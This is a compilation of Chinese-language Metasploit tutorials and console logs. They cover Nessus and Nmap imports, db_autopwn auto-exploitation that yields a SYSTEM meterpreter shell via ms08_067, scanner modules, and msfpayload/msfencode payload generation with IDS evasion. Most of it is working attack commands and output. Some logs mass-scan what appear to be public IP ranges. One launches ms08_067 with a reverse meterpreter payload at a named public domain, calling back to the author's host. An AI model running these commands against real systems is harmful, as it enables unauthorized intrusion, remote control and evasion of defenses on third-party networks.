msf > db_connect postgres:123456@localhost:5432/fuck

查看nessus报告 并导入一个报告

msf > nessus_report_list
[+] Nessus Report List
[+]
ID                                                    Name  Status     Date
—                                                    —-  ——     —-
30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db  fuck  completed  06:04 Apr 16 2012
63801a95-dae6-677a-c0ae-24e23db0ef4bd95ca44becc57f34  xxxx  completed  05:37 Apr 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf > nessus_report_get 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] importing 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] 192.168.8.8
[*] 192.168.8.7
[*] 192.168.8.6
[*] 192.168.8.5
[*] 192.168.8.4
[*] 192.168.8.3
[*] 192.168.8.2
[*] 192.168.8.1
[+] Done
msf >

加载auto_exploit,执行vuln_exploit溢出

msf > load auto_exploit
[*] auto_exploit plug-in loaded.
[*] Successfully loaded plugin: auto_exploit
msf > vuln_exploit -h
OPTIONS:
    -f <opt>  Provide a comma separated list of IP’s and Ranges to skip when running exploits.
    -h        Command Help
    -j <opt>  Max number of concurrent jobs, 3 is the default.
    -m        Only show matched exploits.
    -r <opt>  Minimum Rank for exploits (low, average,normal,good,great and excellent) good is the default.
    -s        Do not limit number of sessions to one per target.
msf > vuln_exploit ruby问题略

或者用db_autopwn好点

msf > load db_autopwn
msf > db_autopwn -t -e -p
………….略
[*] (535/535 [1 sessions]): Waiting on 10 launched modules to finish execution…
[*] (535/535 [1 sessions]): Waiting on 5 launched modules to finish execution…
[*] (535/535 [1 sessions]): Waiting on 0 launched modules to finish execution…
[*] The autopwn command has completed with 1 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================
Active sessions
===============
  Id  Type                   Information                            Connection                                            Via
  —  —-                   ———–                            ———-                                            —
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ SB-43E30C43F14F  192.168.8.9:42218 -> 192.168.8.5:32698 (192.168.8.5)  exploit/windows/smb/ms08_067_netapi
[*] ================================================================================
msf > sessions -l
Active sessions
===============
  Id  Type                   Information                            Connection
  —  —-                   ———–                            ———-
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ SB-43E30C43F14F  192.168.8.9:42218 -> 192.168.8.5:32698 (192.168.8.5)
msf > sessions -i 1
[*] Starting interaction with 1…
meterpreter > ipconfig
Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 65539
============
Name         : AMD PCNET Family PCI Ethernet Adapter
Hardware MAC : 08:00:27:0d:dd:65
MTU          : 1500
IPv4 Address : 192.168.8.5
IPv4 Netmask : 255.255.255.0
meterpreter > background
[*] Backgrounding session 1…

auto_exploit.rb:auto_exploit

Metasploit Framework 漫谈 — 各种谈

1.目录结构

metasploit framework
进入update
输入:svn update 进行文件更新

3.MSF目录结构:
data :包含meterpreter,PassiveX,VNC DLLs,还有一些用户接口的代码如msfweb,和一些插件用到的数据文件

documentiation:包含msf的文档,ruby脚本样例和msf利用的API

external:包含meterpreter,vnc和passiveX payloads的源码

lib:包含msf使用的ruby库

modules:包含exploits,playloads,nops,encoders和auxiliary模块

plugins:包含数据库连接插件,IPS过滤代码和其他一些插件代码

scripts:包含meterpreter的课通过rubyshell利用的脚本,目前包含杀死目标系统antivirus和把meterperter server 实例移动到其他进程的脚本

.svn:包含subversion客户端连接到cvs服务器使用的文件和数据

tools:包含一些有用的脚本和零散工具

2.核心命令

msfconsole core commands
msfconsole
多个会话可以并发执行,命令能够进行交互会话,比如session,jobs
也可以列出和杀死运行中的任务,也可以从一个单一利用创建多个会话
这意味着单个利用发动一个用户指定的主机列表
会话可以通过ctrl+z发送到后台,ctrl+c停止,
msf带有一组强大的API,他们可以通过msfconsole访问
切换到交互式ruby shell,session和Framework使底层交互成为可能

核心命令:
? 帮助菜单
back 从当前环境返回
banner 显示一个MSF banner
cd 切换目录
color 颜色切换
connect 连接一个主机
exit 退出MSF
help 帮助菜单
info 显示一个或多个模块的信息
irb 进入irb脚本模式
jobs 显示和管理作业
kill 杀死一个作业
load 加载一个插件
loadpath 在一个路径搜索并加载模块
quit 退出MSF
resource 运行存储在一个文件中的命令
route 查看一个会话的路由信息
save 保存动作
search 搜索模块名和描述
set 给一个变量赋值
setg 把一个值赋给全局变量
show 显示所给类型的模块,或所有模块
sleep 在限定的秒数内什么也不做
unload 卸载一个模块
unset 解除一个或多个变量
unsetg 解除一个或多个全局变量
use 通过名称选择一个模块
version 显示msf和控制台库版本号

3.Metasploit 功能模块

metasploit 功能模块||MSF主要命令||数据库命令

————————————————-
exploits:

简单来讲,就是针对不同的已知漏洞的利用程序
当我们执行show exploits命令后,显示3行,分别为
exploits名称 等级(rank) 描述
exploit命名规则:
操作系统/服务/模块名称
例如:windows/vnc/realvnc_client
等级(rank)代表好用程度
描述就是对漏洞的简介
查看exploit星系信息:info 模块名

选择一个exploit:use exploits/windows/vnc/real_vnc_client
列出exploit设置选项:show options
options中required的是必须设定的选项
列出exploit的课攻击目标类型:show targets
设置选项:set option 值(如 set RHOST 192.168.0.1)
设置攻击目标:set TARGET 编号(如set Target 2)
————————————————-
payloads module

payload也就是shellcode,就是在漏洞利用成功后所要做的事情,在MSF中为我们提供了大量的使用的payloads。
当我们选择了一个exploit模块并设置完选项后,我们可以用show payloads 来看一下当前exploit 可以用哪个payloads。
payloads命名规则:
操作系统/类型/名称 如:windows/shell/bind_tcp
类型主要有:
shell:得到一个shell
Dllinject:上传DLL注入到进程
patchup***:修补漏洞
upexec:上传并执行一个文件
meterpreter:高级payload
vncinject:高级payload
passiveX:高级payload
payload名称命名规则:
–shell_find_tag:在一个已建立的连接上创建一个shell
–shell_reverse_tcp:反向连接到攻击者主机并创建一个shell
–bind_tcp:监听一个tcp连接
–reverse_tcp:反向建立tcp连接
–reverse_http:通过HTTP隧道通信并创建一个新用户添加到管理组
–add_user:创建一个新用户并添加到管理组
–xxx_ipv6_tcp:基于IPV6
–XXX_nonx_tcp:非No eXecute 或win7(NX是应用在CPU的一种可以防止缓冲区溢出的技术)
–xxx_ord_tcp:有序payload
–xxx_tcp_allports:在所有可能的端口
–详细解释参考 http://www.offensice-security.com/metasploit-unleashed/A-Bit-About-Payloads
设置payload:set PAYLOAD payload_name
列出选项还是:show options
之后设置选项:set RHOST 192.168.0.1
这样exploit 和 payload就设置完毕了,我们就可以对目标主机进行利用了
由于payloads只不过是汇编指令的序列,通常nop在它前面
这可能作为特征用来开发检测这些攻击,因此,payloads需要被编译并且变化nop用于躲避IDS或IPS检测。
MSF提供了一些编码器以及若干NOP生成器
来使检测过程变得极其困难。
————————————————-

攻击实例的演示:

attacking by MSF
演示一个简单的例子
远程溢出windows服务器
ms08067 实例的讲解

CTRL+Z 放入后台执行
sessions
显示后台的信息
sessions -h
sessions -i 1 //重新进入连接CRTRL
CTRL+C 断开连接

—————————-
执行过程:
1.连接到远程系统的漏洞端口
2.交换协议序列直到到达漏洞触发点
3.注入利用代码,其中包含了直接或间接的修改返回地址为我们payload的指令以及nop指令
这增加了我们的代码被执行的机会
4.后续利用,可以是在被创建的用户连接到远程系统或可能是一个GUI客户端到远程系统
————————————————-
auxiliary,encoders,nops 三个模块

nops 很多时候,跳转到shellcode的精确位置可能不知道,nops需要预置到实际的利用上来避免触发IDS
encoders 作用类似nops,payloads也能触发IDS。他们可以通过payload编码来避免在网络上被发现,在目标上解码,按计划执行。
auxiliary:指纹扫描,漏洞扫描,暴力破解,SQL注入,DoS,欺骗,嗅探,漏洞挖掘等等使用辅助工具的集合模块
————————————————-
Msfcli interface
msfcli接口允许用户从命令行直接执行利用,而不需要先启动msfconsole这适合迅速发动攻击,直接指定命令行参数,这在大量的系统需要进行测试同样的漏洞的时候非常有用。
也可以写一个简单的shell脚本,指定一IP范围,依次运行利用的程序,对每个目标系统尝试攻击。
msfcli -h 查看帮助
S:显示模块信息
P:可用payloads
O:选项
T:可用目标
E:执行利用
——–
一个简单的例子:
1.显示选择的利用模块信息
./msfcli<exploit_name> S
2.显示可用payload:
./msfcli <exploit_name> P
3.为exploit选择payload,并显示需要设置的选项
./msfcli <exp> PAYLOAD=<payload> O
4.设置必须的选项,列出可用目标:
./msfcli <exp> payload=<payload> option=value T
5.设置目标并执行利用
./msfcli <exp> payload=<payload> option=value target=number E
——————————
msfweb 用户接口提供人性化的web界面,便于使用模块:
exploits:利用模块,提供模块搜索功能
auxiliarys:辅助程序模块,提供搜索功能
Payloads:payloads模块,提供搜索功能
console:基于web的控制台,相当于msfconsole
sessions:会话模块,当前的会话信息
options:风格设定
about:msfweb的版本信息
————————————————-
msfd interface
msfd 工具打开一个网络接口道msfconsole,它可以被指定的IP地址执行,并且监听端口等待进入的连接,允许一个或多个用户从远程系统连接进msf。
实例:
本机: msfd -a 192.168.1.14 -p 2323
远程主机: nc 192.168.1.14 2323
本机断开链接
taskkill /pid <进程号> /f 【强制关闭】
注意设置的时候是IP地址设为本机的IP地址,其他IP地址不行。
————————————————-
msfpayload and msfencode

msfpayload:该工具使用户可以在命令行修改现有的payload,并获得C perl 或 Raw 的输出,-h参数列出我们可以用的选项,S选项为我们显示具体payload的信息,选定一个特定payload后,我们就可以用msfpayload对其修改了,并且用C 选项,会输出C程序的格式,P选项输出Perl脚本的格式,也可以输出Raw格式,这使得它能被传输到另一个程序,比如msfencode或重定向到一个文件,我们需要为payload设置CMD参数用于创建在成功利用后所要执行的特定命令,以设置一个dir命令,并输出perl脚本为例,./msfpayload windows/exec CMD=dir P

msfenclode:使用程序是一个可以直接访问payload编码器的框架,可以用-l参数列出可用编码器,-h参数列出可选项,用msfpayload是生成raw格式payload的一个简单方法,并可以通过管道输出直接msfencode或从文件中读取它,编码确保不良字符不会出现在payload,最终也改进了躲避IDS能力。
bad characters:不良字符
许多应用程序在接受输入时执行过滤排序,如:web server 可能在unicode编码发动到一段存在漏洞的代码之前对其进行预处理,因此payload可能会被修改,并且无法正常运行。
一些字符也最终成为结束字符串,比如NULL字节(0x00)他们必须也要避免,要确定哪些字符会被预处理,然后进行修改。
———————-
database backend comands //数据库后台命令
msf可以支持多种不同的数据库,当前包括SQLite3(自带驱动),MySQL,PostgreSQL用于探测攻击目标的漏洞和自动利用,并且支持加载amap ,nmap或Nessus扫描报告后,根据目标系统开发端口和可能存在的漏洞进行自动尝试利用,这大大提高了渗透测试人员的工作效率。
数据库后台的命令:
db_add_host 添加一个或多个主机到数据库
db_add_note 添加一个注释到主机
db_add_port 添加一个端口到主机
db_connect 连接一个存在数据库实例
db_create 创建一个新的数据库实例
db_del_host 从数据库删除一个或多个主机
db_del_port 从数据库删除一个端口
db_destory 删除一个存在的数据库
db_disconnect 断开与当前数据库实例的连接
db_driver 指定一个数据库驱动
db_hosts 列出数据库中的所有主机
db_nmap 执行Nmap并记录输出
db_notes 列出数据中的所有注释
db_services 列出数据库中的所有服务
db_vuns 列出数据库中的所有漏洞
db_workspaces 转换数据库工作区
db_import_ip_list 引入一个IP列表文件
db_import_amap_mlog 引入一个THC-Amap扫描结果文件(-o,-m)
db_import_nessus_nbe 引入一个Nessus扫描结果文件(NBE)
db_import_nessus_xml 引入一个Nessus扫描结果文件
db_import_nmap_xml 引入一个Nmap扫描结果文件(-oX)
db_autopwn 自动利用

4.db_autopwn
db_autopwn
参数:
-h 显示帮助
-t 显示多有匹配的利用模块
-x 选择基于漏洞的模块
-p 选择基于开放端口的模块
-e 选择所有匹配目标的利用程序
-r 用一个反向连接的shell(reverse)
-b 用以随机端口的绑定shell(bind)
-q 禁用利用程序输出
-l [范围]值对此范围内的主机进行利用
-X [范围]永远排除此范围内的主机
-Pl [范围]只对开放这些端口的主机进行利用
-PX [范围]永远排除对开放这些端口的主机
-m [范围]只运行名字与正则表达式匹配的模块
————————————-
成功实例:
db_nmap -sV 192.168.1.110 —扫描主机
db_autopwn -p -e -b —– 自动连接||进行攻击

BY Hlly_M风迷搜集
qing.weibo.com/hllym

metasploit中scanner的使用抛砖|portscanner && scanner/smb/smb_version 的使用

端口扫描工具:

[bash]

msf > search portscan

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP "XMas" Port Scanner
msf >

[/bash]

上述各种端口扫描工具使用方法大同小异,只是扫描的类型 和 目的各不相同. 要灵活使用.

以其中的一种为例子:

[bash]

msf > use auxiliary/scanner/portscan/ftpbounce
msf auxiliary(ftpbounce) > show options

Module options (auxiliary/scanner/portscan/ftpbounce):

Name Current Setting Required Description
—- ————— ——– ———–
BOUNCEHOST yes FTP relay host
BOUNCEPORT 21 yes FTP relay port
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads

msf auxiliary(ftpbounce) > set RHOSTS 108.171.217.91/24
RHOSTS => 108.171.217.91/24
msf auxiliary(ftpbounce) > set THREADS 600
THREADS => 600
msf auxiliary(ftpbounce) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: BOUNCEHOST.
msf auxiliary(ftpbounce) > set BOUNCEHOST 110.120.119.54
BOUNCEHOST => 110.120.119.54
msf auxiliary(ftpbounce) > run

[*] Scanned 107 of 256 hosts (041% complete)
[*] Scanned 241 of 256 hosts (094% complete)
[*] Scanned 255 of 256 hosts (099% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftpbounce) >

[/bash]

portscan的其他的工具使用方法类似.

扫描目标主机的操作系统类型:

smb:  server message block

[bash]

msf auxiliary(ftpbounce) > back
msf > search scanner/smb

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/scanner/smb/pipe_auditor normal SMB Session Pipe Auditor
auxiliary/scanner/smb/pipe_dcerpc_auditor normal SMB Session Pipe DCERPC Auditor
auxiliary/scanner/smb/smb2 normal SMB 2.0 Protocol Detection
auxiliary/scanner/smb/smb_enumshares normal SMB Share Enumeration
auxiliary/scanner/smb/smb_enumusers normal SMB User Enumeration (SAM EnumUsers)
auxiliary/scanner/smb/smb_enumusers_domain normal SMB Domain User Enumeration
auxiliary/scanner/smb/smb_login normal SMB Login Check Scanner
auxiliary/scanner/smb/smb_lookupsid normal SMB Local User Enumeration (LookupSid)
auxiliary/scanner/smb/smb_version normal SMB Version Detection
msf >

[/bash]

以smb/smb_version的使用如下,可用以列举服务器的操作系统.一般来讲是扫描不出来的.这丫的漏洞都掉牙的. 再破的服务器都补上这洞了.

但是在渗透personal computer的时候,这个命令是很有用的.一般都可以扫出操作系统类型.

[bash]

msf auxiliary(smb_version) > back
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS 108.171.217.0/24 yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1024 yes The number of concurrent threads

msf auxiliary(smb_version) > set RHOSTS 118.123.106.56/24
RHOSTS => 118.123.106.56/24
msf auxiliary(smb_version) > set THREADS 600
THREADS => 600
msf auxiliary(smb_version) > run

[*] Scanned 042 of 256 hosts (016% complete)
[*] Scanned 100 of 256 hosts (039% complete)
[*] Scanned 120 of 256 hosts (046% complete)
[*] Scanned 127 of 256 hosts (049% complete)
[*] Scanned 136 of 256 hosts (053% complete)
[*] Scanned 231 of 256 hosts (090% complete)
[*] Scanned 233 of 256 hosts (091% complete)
[*] Scanned 241 of 256 hosts (094% complete)
[*] Scanned 245 of 256 hosts (095% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

[/bash]

metasploit中nmap扫描例解

查看metasploit数据库连接状态.metasploit4.0以后版本都自动连接自带数据库.所以,象之前那样load db_mysql然后db_connet没有必要了.

[bash]

msf > db_status
[*] postgresql connected to msf3dev

[/bash]

想要查看db_开头的命令,输入db_连按两下tab健,出如下信息.

[bash]

msf > db_
db_connect db_export db_nmap db_status
db_disconnect db_import db_rebuild_cache

[/bash]

当然,使用help命令未尝不可.

[bash]

msf > help

Core Commands
=============

Command Description
——- ———–
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
help Help menu
info Displays information about one or more module
irb Drop into irb scripting mode
jobs Displays and manages jobs
kill Kill a job
load Load a framework plugin
loadpath Searches for and loads modules from a path
makerc Save commands entered since start to a file
popm Pops the latest module off of the module stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
quit Exit the console
reload_all Reloads all modules from all defined module paths
resource Run the commands stored in a file
route Route traffic through a session
save Saves the active datastores
search Searches module names and descriptions
sessions Dump session listings and display information about sessions
set Sets a variable to a value
setg Sets a global variable to a value
show Displays modules of a given type, or all modules
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more variables
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers
Database Backend Commands
=========================

Command Description
——- ———–
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces

msf >

[/bash]

db_nmap用于对主机端口扫描和服务的发现.常用参数如下:

-A : 深层次扫描

-sS : 试图在扫描时隐藏自己.  和 -sI  某ip   这个参数不能同时使用

-sI  某ip:  使用这个”某ip”作为自己扫描时的ip,别人在查看的时候只能发现时这个某ip在扫描他

-oX 文件名 : 把扫描结果导出到 “文件名”文件.  以便于在metasploit中使用db_import来导入这个结果,然后就可以使用db_autopwn来自动入侵拉,对吧

-Pn :  不经过ping . 在扫描之前不使用ping来判断主机是否存活.在longlong ago . ping来判断主机是否存活是可行可靠的.但是自从某牛发现使用

ping可以发起ddos攻击之后,就对ping协议进行了改进和预防.所以,有时候ping不到主机并不代表主机down. 你懂得.

对了还有一个重要的参数:

-v   :显示扫描进度. 否则你会以为nmap死掉了,而不耐烦把它ctrl – c掉..

 

那么, 一个常用的扫描命令例子:

[bash]

msf > nmap -sS -A -Pn -v -oX ieroot 108.171.217.0/24
[*] exec: nmap -sS -A -Pn -v -oX ieroot 108.171.217.0/24
Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-09-29 19:27 CST
NSE: Loaded 61 scripts for scanning.
Initiating Parallel DNS resolution of 256 hosts. at 19:27
Completed Parallel DNS resolution of 256 hosts. at 19:27, 2.24s elapsed
Initiating SYN Stealth Scan at 19:27
Scanning 64 hosts [1000 ports/host]
Discovered open port 53/tcp on 108.171.217.50
SYN Stealth Scan Timing: About 1.06% done; ETC: 20:15 (0:48:02 remaining)
Discovered open port 53/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.50
Discovered open port 53/tcp on 108.171.217.53
Discovered open port 53/tcp on 108.171.217.51
Discovered open port 80/tcp on 108.171.217.18
Discovered open port 443/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.30
Discovered open port 80/tcp on 108.171.217.35
Discovered open port 53/tcp on 108.171.217.52
Discovered open port 80/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.51
Discovered open port 80/tcp on 108.171.217.30
Discovered open port 80/tcp on 108.171.217.50
Discovered open port 80/tcp on 108.171.217.51

#省略一大块

[/bash]

然后就是

db_import ieroot

ieroot文件是上面nmap扫描的结果嘛.

然后就是:

load db_autopwn

db_autopwn来自动扫描可利用主机了.

db_autopwn的几个常用参数来说明一下:

-e : 对数据库中扫描结果中的每一个主机都发起攻击

-t : 显示所有匹配的模块

-r : 使用reverse连接,反向连接. 反向连接有好处阿. 穿防火墙就用这个参数了

-x : 根据漏洞来选择攻击模块

-p : 根据端口选择攻击模块. 有很多主机把自己的服务的端口改的一塌糊涂.这个时候用-p要慎重哦

所以.过程如下:

[bash]

msf > nmap -sS -A -Pn -v -oX ieroot 108.171.217.51
[*] exec: nmap -sS -A -Pn -v -oX ieroot 108.171.217.51
Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-09-29 19:35 CST
NSE: Loaded 61 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 19:35
Completed Parallel DNS resolution of 1 host. at 19:35, 0.00s elapsed
Initiating SYN Stealth Scan at 19:35
Scanning 108-171-217-51.static.webnx.com (108.171.217.51) [1000 ports]
Completed SYN Stealth Scan at 19:36, 17.18s elapsed (1000 total ports)
Initiating Service scan at 19:36
Initiating OS detection (try #1) against 108-171-217-51.static.webnx.com (108.171.217.51)
Initiating Traceroute at 19:36
Completed Traceroute at 19:36, 3.03s elapsed
Initiating Parallel DNS resolution of 19 hosts. at 19:36
Completed Parallel DNS resolution of 19 hosts. at 19:36, 13.00s elapsed
NSE: Script scanning 108.171.217.51.
Initiating NSE at 19:36
Completed NSE at 19:36, 10.00s elapsed
Nmap scan report for 108-171-217-51.static.webnx.com (108.171.217.51)
Host is up (0.28s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp closed http
8888/tcp closed sun-answerbook
Too many fingerprints match this host to give specific OS details
Network Distance: 20 hops

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.76 ms 121.250.211.1
2 …
3 48.77 ms 202.194.0.125
4 0.62 ms 202.194.0.45
5 0.89 ms 58.194.164.174
6 1.70 ms 222.173.20.205
7 1.63 ms 60.235.2.77
8 11.68 ms 60.235.0.73
9 10.23 ms 202.97.42.174
10 23.02 ms 202.97.40.9
11 21.08 ms 202.97.33.30
12 21.44 ms 202.97.33.190
13 155.27 ms 202.97.50.122
14 324.65 ms 202.97.49.158
15 315.15 ms 10gigabitethernet6-1.core1.lax1.he.net (64.71.131.133)
16 320.71 ms 10gigabitethernet1-3.core1.lax2.he.net (72.52.92.122)
17 314.85 ms 216.218.213.250
18 320.26 ms 100-42-223-146.static.webnx.com (100.42.223.146)
19 299.95 ms 100-42-223-198.static.webnx.com (100.42.223.198)
20 309.17 ms 108-171-217-51.static.webnx.com (108.171.217.51)

Read data files from: /opt/metasploit/common/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.88 seconds
Raw packets sent: 2059 (92.876KB) | Rcvd: 33 (1.688KB)
msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–

msf > db_import ieroot
[*] Importing ‘Nmap XML’ data
[*] Import: Parsing with ‘Rex::Parser::NmapXMLStreamParser’
[*] Importing host 108.171.217.51
[*] Successfully imported /root/ieroot
msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
108.171.217.51 108-171-217-51.static.webnx.com Sun Solaris 9 device

msf >

[/bash]

[bash]

msf > load db_autopwn
[*] Successfully loaded plugin: db_autopwn
msf > db_autopwn -e -p -t
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[-]
[-] Warning: The db_autopwn command is not officially supported and exists only in a branch.
[-] This code is not well maintained, crashes systems, and crashes itself.
[-] Use only if you understand it’s current limitations/issues.
[-] Minimal support and development via neinwechter on GitHub metasploit fork.
[-]
[*] Analysis completed in 44 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] ================================================================================
[*]
[*]
[*] The autopwn command has completed with 0 sessions

msf > sessions -l

Active sessions
===============

No active sessions.

msf > hosts -d

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
108.171.217.51 108-171-217-51.static.webnx.com Sun Solaris 9 device

[*] Deleted 1 hosts
msf >

[/bash]

session不容易得到阿. 如果得到就使用 session -i 1 来连接第一个session. 其他依次. 得到shell就没有什么好说得了.

 

metasploit生成shellcode的命令msfpayload

[bash]

root@ieroot:~# msfpayload -h

Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>

OPTIONS:

-h Help banner
-l List available payloads

root@ieroot:~#

[/bash]

可以生成各种格式的payload, 使用上述usage中最后一个参数设置.

msfpayload的用法和msfcli的用法类似.

[bash]

root@ieroot:~# msfpayload windows/x64/vncinject/reverse_tcp o

Name: Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
Module: payload/windows/x64/vncinject/reverse_tcp
Version: 14774, 15548, 14976
Platform: Windows
Arch: x86_64
Needs Admin: No
Total size: 422
Rank: Normal

Provided by:
sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
AUTOVNC true yes Automatically launch VNC viewer if present
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy
VNCPORT 5900 yes The local port to use for the VNC proxy

Description:
Connect back to the attacker (Windows x64), Inject a VNC Dll via a
reflective loader (Windows x64) (staged)
root@ieroot:~#

[/bash]

其余就很明了了.选项的设置使用 类似于 LHOST=192.168.0.222 这样.查看options使用小写字母o.  生成类型使用C,J,X等设置.

 

另外msfencode可以用于对生成的payload或者叫为payload或者叫他后门都可以.来加密.

msfencode -l 查看可用的加密方式

msfencode  -h获得帮助

metasploit msfcli命令用法,示例

msfcli命令为方便metasploit框架和其他的shell交互而设计.

[bash]

root@ieroot:~# msfcli -h
Usage: /opt/metasploit/msf3/msfcli <exploit_name> <option=value> [mode]
=======================================================================

Mode Description
—- ———–
(A)dvanced Show available advanced options for this module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
(H)elp You’re looking at it baby!
(I)DS Evasion Show available ids evasion options for this module
(O)ptions Show available options for this module
(P)ayloads Show available payloads for this module
(S)ummary Show information about this module
(T)argets Show available targets for this exploit module

root@ieroot:~#

[/bash]

查看某一个exploit的options :

[bash]

root@ieroot:~# msfcli windows/smb/ms08_067_netapi o
[*] Please wait while we load the module tree…

Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

root@ieroot:~#

[/bash]

 

设置options 同时显示payloads的命令如下:

[bash]

root@ieroot:~# msfcli windows/smb/ms08_067_netapi RHOST=127.0.0.1 p
[*] Please wait while we load the module tree…

Compatible payloads
===================

Name Description
—- ———–
generic/custom Use custom string or file as payload. Set either PAYLOADFILE or
PAYLOADSTR.
generic/debug_trap Generate a debug trap in the target process
generic/shell_bind_tcp Listen for a connection and spawn a command shell
generic/shell_reverse_tcp Connect back to attacker and spawn a command shell
generic/tight_loop Generate a tight loop in the target process
windows/dllinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a DLL via a reflective loader
windows/dllinject/bind_nonx_tcp Listen for a connection (No NX), Inject a DLL via a reflective loader
windows/dllinject/bind_tcp Listen for a connection, Inject a DLL via a reflective loader
windows/dllinject/reverse_http Tunnel communication over HTTP, Inject a DLL via a reflective loader
windows/dllinject/reverse_ipv6_http Tunnel communication over HTTP and IPv6, Inject a DLL via a reflective loader
windows/dllinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a DLL via a reflective loader
windows/dllinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a DLL via a reflective loader
windows/dllinject/reverse_ord_tcp Connect back to the attacker, Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp Connect back to the attacker, Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp_dns Connect back to the attacker, Inject a DLL via a reflective loader
windows/dns_txt_query_exec Performs a TXT query against a series of DNS record(s) and executes the returned payload
windows/exec Execute an arbitrary command
windows/loadlibrary Load an arbitrary library path

#….这里省略n多条

[/bash]

设置好options,payloads然后执行exploit的命令如下:

[bash]

root@ieroot:~# msfcli windows/smb/ms08_067_netapi RHOST=www.haotuan.us PAYLOAD=windows/meterpreter/reverse_tcp LHOST=www.ieroot.com E
[*] Please wait while we load the module tree…

______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
|______________________________________________________________________________|

&nbsp;

=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ — –=[ 961 exploits – 509 auxiliary – 153 post
+ — –=[ 257 payloads – 28 encoders – 8 nops
=[ svn r15907 updated today (2012.09.28)

RHOST => www.haotuan.us
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => www.ieroot.com
[-] Handler failed to bind to 173.193.106.10:4444
